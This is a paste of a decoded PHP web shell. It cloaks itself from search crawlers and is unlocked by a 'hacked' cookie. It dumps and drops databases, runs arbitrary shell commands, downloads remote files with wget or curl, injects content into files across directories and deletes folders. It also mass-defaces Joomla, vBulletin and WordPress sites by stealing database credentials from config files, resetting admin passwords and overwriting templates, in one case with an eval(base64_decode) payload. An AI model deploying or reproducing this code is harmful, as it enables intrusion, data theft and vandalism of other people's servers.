· 9 years ago · Nov 27, 2016, 06:26 PM
1/* Decoded by unphp.net */
2
3<?php ?><?php
4$plsym = "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";
5@set_magic_quotes_runtime(0);
6@ini_set('error_log', NULL);
7@ini_set('log_errors', 0);
8ob_start();
9error_reporting(0);
10@set_time_limit(0);
11@ini_set('max_execution_time', 0);
12@ini_set('output_buffering', 0);
13if (!empty($_SERVER['HTTP_USER_AGENT'])) {
14 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
15 if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
16 header('HTTP/1.0 404 Not Found');
17 exit;
18 }
19}
20if (isset($_COOKIE['hacked']) && $_COOKIE['hacked'] == md5($pass)) {
21 // Dump Database
22 if ($_GET["action"] == "dumpDB") {
23 $self = $_SERVER["PHP_SELF"];
24 if (isset($_COOKIE['dbserver'])) {
25 $date = date("Y-m-d");
26 $dbserver = $_COOKIE["dbserver"];
27 $dbuser = $_COOKIE["dbuser"];
28 $dbpass = $_COOKIE["dbpass"];
29 $dbname = $_GET['dbname'];
30 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
31 $file = "Dump-$dbname-$date";
32 $file = "Dump-$dbname-$date.sql";
33 $fp = fopen($file, "w");
34 function write($data) {
35 global $fp;
36 fwrite($fp, $data);
37 }
38 mysql_connect($dbserver, $dbuser, $dbpass);
39 mysql_select_db($dbname);
40 $tables = mysql_query("SHOW TABLES");
41 while ($i = mysql_fetch_array($tables)) {
42 $i = $i['Tables_in_' . $dbname];
43 $create = mysql_fetch_array(mysql_query("SHOW CREATE TABLE " . $i));
44 write($create['Create Table'] . ";
45
46");
47 $sql = mysql_query("SELECT * FROM " . $i);
48 if (mysql_num_rows($sql)) {
49 while ($row = mysql_fetch_row($sql)) {
50 foreach ($row as $j => $k) {
51 $row[$j] = "'" . mysql_escape_string($k) . "'";
52 }
53 write("INSERT INTO $i VALUES(" . implode(",", $row) . ");");
54 }
55 }
56 }
57 fclose($fp);
58 header("Content-Disposition: attachment; filename=" . $file);
59 header("Content-Type: application/download");
60 header("Content-Length: " . filesize($file));
61 flush();
62 $fp = fopen($file, "r");
63 while (!feof($fp)) {
64 echo fread($fp, 65536);
65 flush();
66 }
67 fclose($fp);
68 }
69 }
70 $self = $_SERVER["PHP_SELF"];
71 $url = 'http://' . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'];
72 $path = explode('/', $url);
73 $curr_url = str_replace($path[count($path) - 1], '', $url);
74 $os = "N/D";
75 $bdmessage = null;
76 $basedir = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir")) == "ON") ? "<font class=txt>ON</font>" : "OFF";
77 $etc_passwd = @is_readable("/etc/passwd") ? "Yes" : "No";
78 if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
79 $SEPARATOR = '\';
80 $os = "Windows";
81 $directorysperator="\";
82 }
83 else
84 {
85 $os = "Linux";
86 $directorysperator=' / ';
87 }
88 function Trail($d,$directsperator)
89 {
90 $d=explode($directsperator,$d);
91 array_pop($d);
92 array_pop($d);
93 $str=implode($d,$directsperator);
94 return $str;
95 }
96
97 function randomt()
98 {
99 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
100 srand((double)microtime()*1000000);
101 $i = 0;
102 $pass = '' ;
103
104 while ($i <= 7)
105 {
106 $num = rand() % 33;
107 $tmp = substr($chars, $num, 1);
108 $pass = $pass . $tmp;
109 $i++;
110 }
111 return $pass;
112 }
113 function make_subdomain($subDomain,$cPanelUser,$cPanelPass,$subindex)
114 {
115 $rootDomain = $_SERVER['SERVER_NAME'];
116 $buildRequest = "/frontend/x3/subdomain/doadddomain.html?rootdomain=" . $rootDomain . "&domain=" . $subDomain . "&dir=public_html/" . $subDomain;
117
118 $openSocket = fsockopen('localhost',2082);
119 if(!$openSocket) {
120 return "Socket error<BR>";
121 }
122
123 $authString = $cPanelUser . ":" . $cPanelPass;
124 $authPass = base64_encode($authString);
125 $buildHeaders = "GET " . $buildRequest ."
126";
127 $buildHeaders .= "HTTP/1.0
128";
129 $buildHeaders .= "Host:localhost
130";
131 $buildHeaders .= "Authorization: Basic " . $authPass . "
132";
133 $buildHeaders .= "
134";
135
136 fputs($openSocket, $buildHeaders);
137 while(!feof($openSocket)) {
138 fgets($openSocket,128);
139 }
140 fclose($openSocket);
141 // create index file
142 @chdir($subDomain);
143 $file5 = fopen("index.html","w");
144 fputs($file5,$subindex);
145 fclose($file5);
146
147 $newDomain = "http://" . $subDomain . "." . $rootDomain . "/<BR>";
148
149 return $newDomain;
150
151 }
152 // Database functions
153 function listdatabase()
154 {
155
156 $self=$_SERVER["PHP_SELF"];
157 ?>
158 <br>
159 <form>
160 <table>
161 <tr>
162 <td><input type="text" class="box" name="dbname"></td>
163 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
164 </tr>
165 </table>
166 </form>
167 <br>
168 <?php
169 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
170 $result = mysql_query("SHOW DATABASE");
171 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>
172";
173
174 $pDB = mysql_list_dbs( $mysqlHandle );
175 $num = mysql_num_rows( $pDB );
176 for( $i = 0; $i < $num; $i++ )
177 {
178 $dbname = mysql_dbname( $pDB, $i );
179 mysql_select_db($dbname,$mysqlHandle);
180 $result = mysql_query("SHOW TABLES");
181 $num_of_tables = mysql_num_rows($result);
182 echo "<tr>
183";
184 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>
185";
186 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>
187";
188 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>
189";
190 echo "<td><a href='$self ? action = dumpDB & dbname = $dbname' onClick=\"return confirm('DumpDatabase\'$dbname\'?') \">Dump</a></td>
191";
192 echo "</tr>
193";
194 }
195 echo "</table>
196";
197 mysql_close($mysqlHandle);
198}
199function listtable() {
200 $self = $_SERVER["PHP_SELF"];
201 $dbserver = $_COOKIE["dbserver"];
202 $dbuser = $_COOKIE["dbuser"];
203 $dbpass = $_COOKIE["dbpass"];
204 $dbname = $_GET['dbname'];
205 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
206?>
207 <br><br>
208 <form>
209 <table>
210 <tr>
211 <td><input type="text" class="box" name="tablename"></td>
212 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname']; ?>')" value=" Create Table " name="createmydb" class="but"></td>
213 </tr>
214 </table>
215
216 <br>
217 <form>
218 <table>
219 <tr>
220 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
221 </tr>
222 <tr>
223 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname']; ?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
224 </tr>
225 </table>
226 </form>
227
228 <?php
229 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
230 mysql_select_db($dbname);
231 $pTable = mysql_list_tables($dbname);
232 if ($pTable == 0) {
233 $msg = mysql_error();
234 echo "<h3>Error : $msg</h3><p>
235";
236 return;
237 }
238 $num = mysql_num_rows($pTable);
239 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>
240";
241 for ($i = 0;$i < $num;$i++) {
242 $tablename = mysql_tablename($pTable, $i);
243 $result = mysql_query("select * from $tablename");
244 $num_rows = mysql_num_rows($result);
245 echo "<tr>
246";
247 echo "<td>
248";
249 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)
250";
251 echo "</td>
252";
253 echo "<td>
254";
255 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>
256";
257 echo "</td>
258";
259 echo "<td>
260";
261 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>
262";
263 echo "</td>
264";
265 echo "<td>
266";
267 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>
268";
269 echo "</td>
270";
271 echo "<td>
272";
273 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>
274";
275 echo "</td>
276";
277 echo "</tr>
278";
279 }
280 echo "</table></form>";
281 mysql_close($mysqlHandle);
282 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
283}
284function paramexe($n, $v) {
285 $v = trim($v);
286 if ($v) {
287 echo '<span>' . $n . ': </span>';
288 if (strpos($v, "
289") === false) echo '<font class=txt size=2>' . $v . '</font><br>';
290 else echo '<pre class=ml1><font class=txt>' . $v . '</font></pre>';
291 }
292}
293$mycount = 0;
294function injectdir($dir, $filetype, $mode, $lolinject) {
295 global $curfile, $mycount;
296 if (is_dir($dir)) {
297 $objects = scandir($dir);
298 foreach ($objects as $object) {
299 if ($object != '.' && $object != '..' && strpos($dir, 'dhanush') == false && strpos($dir, 'sym') == false) {
300 if (is_dir($dir . '/' . $object)) {
301 // if we find a directory, do a recursive call
302 injectdir($dir . '/' . $object, $filetype, $mode, $lolinject);
303 } else {
304 $file_parts = pathinfo($object);
305 if ($file_parts['extension'] == $filetype) {
306 if (($dir . '/' . $object) == $curfile) continue;
307 $fp = fopen($dir . '/' . $object, $mode);
308 if (fputs($fp, $lolinject)) {
309 $mycount++;
310 echo '<br><font class=txt >' . $dir . '/' . $object . ' was injected<br></font>';
311 } else echo '<font >failed to inject ' . $dir . '/' . $object . '<BR></font>';
312 }
313 }
314 }
315 }
316 }
317}
318$dir = getcwd();
319if (isset($_GET['dir'])) {
320 $dir = $_GET['dir'];
321}
322function rrmdir($dir) {
323 if (is_dir($dir)) // ensures that we actually have a directory
324 {
325 $objects = scandir($dir); // gets all files and folders inside
326 foreach ($objects as $object) {
327 if ($object != '.' && $object != '..') {
328 if (is_dir($dir . '/' . $object)) {
329 // if we find a directory, do a recursive call
330 rrmdir($dir . '/' . $object);
331 } else {
332 // if we find a file, simply delete it
333 unlink($dir . '/' . $object);
334 }
335 }
336 }
337 // the original directory is now empty, so delete it
338 rmdir($dir);
339 }
340}
341function which($pr) {
342 $path = execmd("which $pr");
343 if (!empty($path)) return trim($path);
344 else return trim($pr);
345}
346function remotedownload($cmd, $url) {
347 $namafile = basename($url);
348 switch ($cmd) {
349 case 'wwget' : execmd(which('wget') . " " . $url . " -O " . $namafile);
350 break;
351 case 'wlynx':
352 execmd(which('lynx') . " -source " . $url . " > " . $namafile);
353 break;
354 case 'wfread':
355 execmd($wurl, $namafile);
356 break;
357 case 'wfetch':
358 execmd(which('fetch') . " -o " . $namafile . " -p " . $url);
359 break;
360 case 'wlinks':
361 execmd(which('links') . " -source " . $url . " > " . $namafile);
362 break;
363 case 'wget':
364 execmd(which('GET') . " " . $url . " > " . $namafile);
365 break;
366 case 'wcurl':
367 execmd(which('curl') . " " . $url . " -o " . $namafile);
368 break;
369 default:
370 break;
371}
372return $namafile;
373}
374function magicboom($text) {
375 if (!get_magic_quotes_gpc()) return $text;
376 return stripslashes($text);
377}
378##################################
379function execmd($cmd, $d_functions = "None") {
380 if ($d_functions == "None") {
381 $ret = passthru($cmd);
382 return $ret;
383 }
384 $funcs = array("shell_exec", "exec", "passthru", "system", "popen", "proc_open");
385 $d_functions = str_replace(" ", "", $d_functions);
386 $dis_funcs = explode(",", $d_functions);
387 foreach ($funcs as $safe) {
388 if (!in_array($safe, $dis_funcs)) {
389 if ($safe == "exec") {
390 $ret = @exec($cmd);
391 $ret = join("
392", $ret);
393 return $ret;
394 } elseif ($safe == "system") {
395 $ret = @system($cmd);
396 return $ret;
397 } elseif ($safe == "passthru") {
398 $ret = @passthru($cmd);
399 return $ret;
400 } elseif ($safe == "shell_exec") {
401 $ret = @shell_exec($cmd);
402 return $ret;
403 } elseif ($safe == "popen") {
404 $ret = @popen("$cmd", 'r');
405 if (is_resource($ret)) {
406 while (@!feof($ret)) $read.= @fgets($ret);
407 @pclose($ret);
408 return $read;
409 }
410 return -1;
411 } elseif ($safe = "proc_open") {
412 $cmdpipe = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'));
413 $resource = @proc_open($cmd, $cmdpipe, $pipes);
414 if (@is_resource($resource)) {
415 while (@!feof($pipes[1])) $ret.= @fgets($pipes[1]);
416 @fclose($pipes[1]);
417 @proc_close($resource);
418 return $ret;
419 }
420 return -1;
421 }
422 }
423 }
424 return -1;
425}
426function entre2v2($text, $marqueurDebutLien, $marqueurFinLien, $i = 1) {
427 $ar0 = explode($marqueurDebutLien, $text);
428 $ar1 = explode($marqueurFinLien, $ar0[$i]);
429 return trim($ar1[0]);
430}
431function changeindexjo($conf, $h, $site) {
432 global $defcount;
433 $dol = '$';
434 $sitename = entre2v2($conf, $dol . "sitename = '", "';");
435 $username = entre2v2($conf, $dol . "user = '", "';");
436 $password = entre2v2($conf, $dol . "password = '", "';");
437 $dbname = entre2v2($conf, $dol . "db = '", "';");
438 $prefix = entre2v2($conf, $dol . "dbprefix = '", "';");
439 $localhost = entre2v2($conf, $dol . "host = '", "';");
440 $co = randomt();
441 $link = mysql_connect($localhost, $username, $password);
442 mysql_select_db($dbname, $link);
443 $tryChaningInfo = mysql_query("UPDATE " . $prefix . "users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
444 $req = mysql_query("SELECT * from `" . $prefix . "extensions` ");
445 if ($req) {
446 $req = mysql_query("SELECT * from `" . $prefix . "template_styles` WHERE client_id='0' and home='1'");
447 $data = mysql_fetch_array($req);
448 $template_name = $data["template"];
449 $req = mysql_query("SELECT * from `" . $prefix . "extensions` WHERE name='" . $template_name . "'");
450 $data = mysql_fetch_array($req);
451 $template_id = $data["extension_id"];
452 $url2 = $site_url = $site . "/administrator/index.php";
453 $ch = curl_init();
454 curl_setopt($ch, CURLOPT_URL, $url2);
455 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
456 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
457 curl_setopt($ch, CURLOPT_HEADER, 1);
458 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
459 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
460 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
461 $buffer = curl_exec($ch);
462 $return = entre2v2($buffer, '<input type="hidden" name="return" value="', '"');
463 $hidden = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 4);
464 $url2 = $site_url . "/index.php";
465 $ch = curl_init();
466 curl_setopt($ch, CURLOPT_URL, $url2);
467 curl_setopt($ch, CURLOPT_POST, 1);
468 curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123456789&option=com_login&task=login&return=" . $return . "&" . $hidden . "=1");
469 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
470 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
471 curl_setopt($ch, CURLOPT_HEADER, 0);
472 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
473 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
474 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
475 $buffer = curl_exec($ch);
476 $pos = strpos($buffer, "com_config");
477 echo "<tr align =center>";
478 echo '<td>admin : 123456789</td>';
479 $pos = strpos($buffer, "com_config");
480 if ($pos === false) echo ("<td>[-] Login Error</td>");
481 else echo ("<td><font class=txt>[+] Login Success</font></td>");
482 $url2 = $site_url . "/index.php?option=com_templates&task=source.edit&id=" . base64_encode($template_id . ":index.php");
483 $ch = curl_init();
484 curl_setopt($ch, CURLOPT_URL, $url2);
485 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
486 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
487 curl_setopt($ch, CURLOPT_HEADER, 0);
488 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
489 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
490 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
491 $buffer = curl_exec($ch);
492 $hidden2 = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 2);
493 $url2 = $site_url . "/index.php?option=com_templates&layout=edit";
494 $ch = curl_init();
495 curl_setopt($ch, CURLOPT_URL, $url2);
496 curl_setopt($ch, CURLOPT_POST, 1);
497 curl_setopt($ch, CURLOPT_POSTFIELDS, "jform[source]=" . $h . "&jform[filename]=index.php&jform[extension_id]=" . $template_id . "&" . $hidden2 . "=1&task=source.save");
498 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
499 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
500 curl_setopt($ch, CURLOPT_HEADER, 0);
501 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
502 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
503 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
504 $buffer = curl_exec($ch);
505 $pos = strpos($buffer, '<dd class="message message">');
506 if ($pos === false) {
507 echo ("<td><a href=http://" . $site . ">" . $site . "</a></td><td>Cannot Defaced</td>");
508 } else {
509 $defcount++;
510 echo ("<td><a href=http://" . $site . ">" . $site . "</a></td><td><font class=txt>Joomla Defaced</font></td>");
511 }
512 } else {
513 $req = mysql_query("SELECT * from `" . $dbprefix . "templates_menu` WHERE client_id='0'");
514 $data = mysql_fetch_array($req);
515 $template_name = $data["template"];
516 $url2 = $site_url . "/index.php";
517 $ch = curl_init();
518 curl_setopt($ch, CURLOPT_URL, $url2);
519 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
520 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
521 curl_setopt($ch, CURLOPT_HEADER, 1);
522 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
523 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
524 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
525 $buffer = curl_exec($ch);
526 $hidden = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 3);
527 $url2 = $site_url . "/index.php";
528 $ch = curl_init();
529 curl_setopt($ch, CURLOPT_URL, $url2);
530 curl_setopt($ch, CURLOPT_POST, 1);
531 curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123456789&option=com_login&task=login&" . $hidden . "=1");
532 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
533 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
534 curl_setopt($ch, CURLOPT_HEADER, 0);
535 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
536 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
537 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
538 $buffer = curl_exec($ch);
539 $pos = strpos($buffer, "com_config");
540 echo "<tr align =center>";
541 echo '<td>admin : 123456789</td>';
542 if ($pos === false) echo ("<td>[-] Login Error</td>");
543 else echo ("<td><font class=txt>[+] Login Success</font></td>");
544 $url2 = $site_url . "/index.php?option=com_templates&task=edit_source&client=0&id=" . $template_name;
545 $ch = curl_init();
546 curl_setopt($ch, CURLOPT_URL, $url2);
547 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
548 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
549 curl_setopt($ch, CURLOPT_HEADER, 0);
550 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
551 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
552 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
553 $buffer = curl_exec($ch);
554 $hidden2 = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 6);
555 $url2 = $site_url . "/index.php?option=com_templates&layout=edit";
556 $ch = curl_init();
557 curl_setopt($ch, CURLOPT_URL, $url2);
558 curl_setopt($ch, CURLOPT_POST, 1);
559 curl_setopt($ch, CURLOPT_POSTFIELDS, "filecontent=" . $h . "&id=" . $template_name . "&cid[]=" . $template_name . "&" . $hidden2 . "=1&task=save_source&client=0");
560 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
561 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
562 curl_setopt($ch, CURLOPT_HEADER, 0);
563 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
564 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
565 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
566 $buffer = curl_exec($ch);
567 $pos = strpos($buffer, '<dd class="message message fade">');
568 if ($pos === false) {
569 echo ("<td><a href=http://" . $site . ">" . $site . "</a></td><td>Cannot Deface</td>");
570 } else {
571 $defcount++;
572 echo ("<td><a href=http://" . $site . ">" . $site . "</a></td><td><font class=txt>Joomla Defaced</font></td>");
573 }
574 }
575 echo "</tr>";
576}
577function changeindexvb($conf, $index) {
578 $dol = '$';
579 $username = entre2v2($conf, "['MasterServer']['username'] = '", "';");
580 $password = entre2v2($conf, "['MasterServer']['password'] = '", "';");
581 $dbname = entre2v2($conf, "se']['dbname'] = '", "';");
582 $prefix = entre2v2($conf, "['Database']['tableprefix'] = '", "';");
583 $localhost = entre2v2($conf, "['MasterServer']['servername'] = '", "';");
584 $con = @mysql_connect($localhost, $username, $password);
585 $db = @mysql_select_db($dbname, $con);
586 $ss = mysql_query("SELECT * from `" . $prefix . "setting` WHERE varname='bburl'");
587 $data = mysql_fetch_array($ss);
588 echo "<tr align=center>";
589 $index = str_replace('"', '\"', $index);
590 $attack = "{\${eval(base64_decode(\'";
591 $attack.= base64_encode("echo \"$index\";");
592 $attack.= "\'))}}{\${exit()}}</textarea>";
593 $query = "UPDATE " . $prefix . "template SET template = '$attack'";
594 $result = @mysql_query($query, $con);
595 if ($result) echo "<td><a href=" . $data["value"] . ">" . $data["value"] . "</a></td><td><font class=txt><blink>Vbulletin Forum Defaced Successfully</blink></font></td>";
596 else echo "<td><a href=" . $data["value"] . ">" . $data["value"] . "</a></td><td><blink>Cannot Deface Vbulletin Forum</blink></td>";
597 echo "<tr>";
598}
599function changeindexwp($conf, $index) {
600 $index = urlencode($index);
601 $dol = '$';
602 $username = entre2v2($conf, "define('DB_USER', '", "');");
603 $password = entre2v2($conf, "define('DB_PASSWORD', '", "');");
604 $dbname = entre2v2($conf, "define('DB_NAME', '", "');");
605 $prefix = entre2v2($conf, $dol . "table_prefix = '", "'");
606 $host = entre2v2($conf, "define('DB_HOST', '", "');");
607 $con = @mysql_connect($host, $username, $password);
608 $db = @mysql_select_db($dbname, $con);
609 $req1 = mysql_query("UPDATE `" . $prefix . "users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
610 if ($req1) {
611 $req = mysql_query("SELECT * from `" . $prefix . "options` WHERE option_name='home'");
612 $data = mysql_fetch_array($req);
613 $site_url = $data["option_value"];
614 $req = mysql_query("SELECT * from `" . $prefix . "options` WHERE option_name='template'");
615 $data = mysql_fetch_array($req);
616 $template = $data["option_value"];
617 $req = mysql_query("SELECT * from `" . $prefix . "options` WHERE option_name='current_theme'");
618 $data = mysql_fetch_array($req);
619 $current_theme = $data["option_value"];
620 $useragent = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
621 $url2 = $site_url . "/wp-login.php";
622 $ch = curl_init();
623 curl_setopt($ch, CURLOPT_URL, $url2);
624 curl_setopt($ch, CURLOPT_POST, 1);
625 curl_setopt($ch, CURLOPT_POSTFIELDS, "log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
626 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
627 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
628 curl_setopt($ch, CURLOPT_HEADER, 0);
